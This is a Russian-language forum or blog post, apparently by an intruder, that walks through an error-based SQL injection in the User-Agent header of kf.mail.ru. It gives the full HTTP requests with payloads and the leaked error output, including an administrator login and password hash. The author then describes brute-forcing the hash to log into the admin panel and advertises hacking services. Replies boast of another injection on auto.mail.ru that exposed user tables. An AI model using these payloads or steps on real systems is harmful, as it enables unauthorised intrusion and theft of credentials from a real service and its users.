SQL-injection на mail.ru Открываю блог скульей =) SQL-injection, конечно, не на самом mail.ru, а на поддомене kf.mail.ru. Отправляем запрос: Code: GET http://kf.mail.ru/index.php HTTP/1.0 User-Agent: Mozilla "and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and "1 Host: kf.mail.ru Accept: text/html Connection: Keep-Alive Получаем: Code: SQL Error: Duplicate entry 'COLLATIONS1' for key 1 at /var/www/megaferma/lib/classes/Pers/Game.php line 123 Code 1062 Message Duplicate entry 'COLLATIONS1' for key 1 Query INSERT INTO session SET sessionhash = "bcb98e2c5cbc4e314d053f2cfe9f2e56", host="xx.xx.xx.xx", lastactivity="2012-03-27 09:14:57", useragent="Mozilla "and(select 1 from(select count(*),concat((select table_name from information_schema.tables limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and "1" Context /var/www/megaferma/lib/classes/Pers/Game.php line 123 Отправляем запрос: Code: User-Agent: Mozilla "and(select 1 from(select count(*),concat((select concat_ws(0x3a,login,passwd) from admin_profiles limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and "1 Host: kf.mail.ru Accept: text/html Connection: Keep-Alive Получаем логин и пароль второго админа: Code: SQL Error: Duplicate entry 'antiwkololo:md5('antiwkololo')' for key 1 at /var/www/megaferma/lib/classes/Pers/Game.php line 115 Code 1062 Message Duplicate entry 'antiwkololo:md5('antiwkololo')' for key 1 Query INSERT INTO session SET sessionhash = "bcb98e2c5cbc4e314d053f2cfe9f2e56", host="xx.xx.xx.xx", lastactivity="2012-03-27 09:18:09", useragent="Mozilla "and(select 1 from(select count(*),concat((select concat_ws(0x3a,login,passwd) from admin_profiles limit 1,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and "1" Context /var/www/megaferma/lib/classes/Pers/Game.php line 115 Получили логин и пароль в md5. Брутим и логинимся по адресу /admin/. Все банально, INSERT-скулья в User-Agent. Надеюсь, ребята из mail.ru меня не казнят Спасибо! Читайте мой блог =) Оригинал по адресу: http://dbitems.ru/blog/?x=entry:entry120327-071505 А так же услуги по взлому
помню года 3 назад была скуля на auto.mail.ru, в бд было 255 таблиц по ~30000 пользователей в каждой но без паролей но тоже было весело
Спасибо) Если найдете какие уязвимости в моем блоге, то пишите в ПМ, как mr.Penguin , за что большое спасибо ему. Нашел еще одну крупную скулью) Потом опубликую)
